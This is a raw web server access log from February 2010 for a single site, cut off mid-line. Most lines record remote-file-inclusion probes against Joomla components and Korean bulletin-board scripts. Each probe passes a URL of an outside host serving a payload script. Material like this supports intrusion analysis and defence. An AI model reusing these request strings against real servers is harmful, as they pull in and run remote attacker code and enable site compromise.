119.63.198.58 - - [08/Feb/2010:11:04:43 -0800] "GET /orange_g/forum/viewtopic.php?p=25339 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "puaga.com"
72.55.146.200 - - [08/Feb/2010:11:08:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [08/Feb/2010:11:08:41 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [08/Feb/2010:11:08:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:09:23 -0800] "GET /logs/access_100106.log//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [08/Feb/2010:11:09:23 -0800] "GET /logs/access_100106.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:10:10 -0800] "GET /logs/access_100109.log//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:11:10:15 -0800] "GET /logs/access_100111.log////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:11:10:15 -0800] "GET /logs/access_100110.log////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:16 -0800] "GET //bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:16 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:16 -0800] "GET /logs/access_100129.log///bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:16 -0800] "GET /logs/access_100202.log///bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.14 - - [08/Feb/2010:11:10:17 -0800] "GET /ideal/forum/viewtopic.php?p=18700 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:20 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:20 -0800] "GET /logs/access_100129.log///bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:10:20 -0800] "GET /logs/access_100202.log///bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:10:35 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:10:35 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:10:35 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:11:18 -0800] "GET /logs/access_100106.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:14:07 -0800] "GET /logs/access_100123.log//include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:14:07 -0800] "GET /logs//include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:14:07 -0800] "GET /include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:14:18 -0800] "GET /logs/access_100122.log//include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:15:05 -0800] "GET //include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:15:05 -0800] "GET /logs/access_100123.log%20%20///include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:15:05 -0800] "GET /logs///include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:15:13 -0800] "GET /logs/access_100119.log%20%20///include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:11:15:58 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:11:15:58 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:11:15:59 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:11:16:15 -0800] "GET /logs/access_100118.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:17:10 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:17:10 -0800] "GET /logs/access_100113.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:17:10 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:11:17:12 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:17:19 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:27 -0800] "GET /bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:27 -0800] "GET /logs/access_100202.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:27 -0800] "GET /logs//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:27 -0800] "GET /logs/access_100121.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:39 -0800] "GET /bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:39 -0800] "GET /logs//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:39 -0800] "GET /logs/access_100121.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:17:39 -0800] "GET /logs/access_100202.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:11:17:42 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.58.212 - - [08/Feb/2010:11:17:59 -0800] "GET /logs/access_100203.log///bbs/write_update.php?board_skin_path=http://www.as-salat.fr/administrator/components/com_remository/sh0x.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
76.73.58.212 - - [08/Feb/2010:11:17:59 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.as-salat.fr/administrator/components/com_remository/sh0x.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
76.73.58.212 - - [08/Feb/2010:11:17:59 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.as-salat.fr/administrator/components/com_remository/sh0x.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:18:08 -0800] "GET /logs//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:18:08 -0800] "GET /logs/access_100203.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:18:09 -0800] "GET /bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:18:15 -0800] "GET /logs/access_100203.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:18:15 -0800] "GET /bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:18:15 -0800] "GET /logs//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:11:19:18 -0800] "GET /logs/access_100130.log//write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.135.42.60 - - [08/Feb/2010:11:19:19 -0800] "GET /logs/access.log//bbs/delete_all.php///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:19:24 -0800] "GET /bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:19:24 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:19:24 -0800] "GET /logs//bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:19:37 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:19:37 -0800] "GET /bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:19:37 -0800] "GET /logs//bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:19:43 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:19:43 -0800] "GET /logs/access_100113.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:19:43 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:19:49 -0800] "GET //include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:19:49 -0800] "GET /logs///include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:19:49 -0800] "GET /logs/access_100123.log///include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [08/Feb/2010:11:19:54 -0800] "GET /logs/access_100119.log///include/lib.inc.php?site_path=http://kjmed.net/bbs/idfx1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:11:20:01 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:11:20:06 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:11:20:09 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:20:29 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:11:20:56 -0800] "GET /logs/access_100130.log%20%20//write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:20:58 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:11:21:08 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:11:21:08 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:11:21:08 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:11:21:32 -0800] "GET /logs/access_100118.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:21:53 -0800] "GET //bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:21:53 -0800] "GET /logs/access_100129.log///bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:21:53 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:21:59 -0800] "GET /logs/access_100202.log///bbs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:11:22:04 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:11:22:04 -0800] "GET /logs/delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:11:22:05 -0800] "GET /logs/access_100108.log%20%20//write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:11:22:05 -0800] "GET /logs/access_100202.log%20%20/delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:11:22:21 -0800] "GET /popup_window.php?site_isp_root=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:11:22:21 -0800] "GET /logs/access_100113.log%20%20//popup_window.php?site_isp_root=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:11:22:21 -0800] "GET /logs//popup_window.php?site_isp_root=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:11:22:27 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:11:22:28 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:11:22:31 -0800] "GET /logs/access_100115.log%20%20//popup_window.php?site_isp_root=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:11:22:34 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:11:23:06 -0800] "GET /logs/access_100130.log%20%20/delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [08/Feb/2010:11:25:06 -0800] "GET /logs/index.php?body=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [08/Feb/2010:11:25:07 -0800] "GET /index.php?body=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [08/Feb/2010:11:25:11 -0800] "GET /logs/access_100111.log/index.php?body=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [08/Feb/2010:11:25:17 -0800] "GET /logs/access_100115.log/index.php?body=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:11:25:34 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:11:25:34 -0800] "GET /skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:11:25:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:11:26:24 -0800] "GET /logs/access_100108.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:11:26:24 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:11:26:24 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:11:26:44 -0800] "GET /logs/access_100103.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:27:51 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:27:51 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [08/Feb/2010:11:27:51 -0800] "GET /logs/access_100120.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
77.88.25.28 - - [08/Feb/2010:11:28:07 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.atesh.info"
72.55.146.200 - - [08/Feb/2010:11:28:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [08/Feb/2010:11:28:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [08/Feb/2010:11:28:12 -0800] "GET /logs/access_100120.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:11:28:35 -0800] "GET /logs/access_100103.log//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:11:28:48 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:11:28:57 -0800] "GET /pictures/p9/ HTTP/1.0" 302 10320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:11:28:58 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:11:29:00 -0800] "GET /login/reg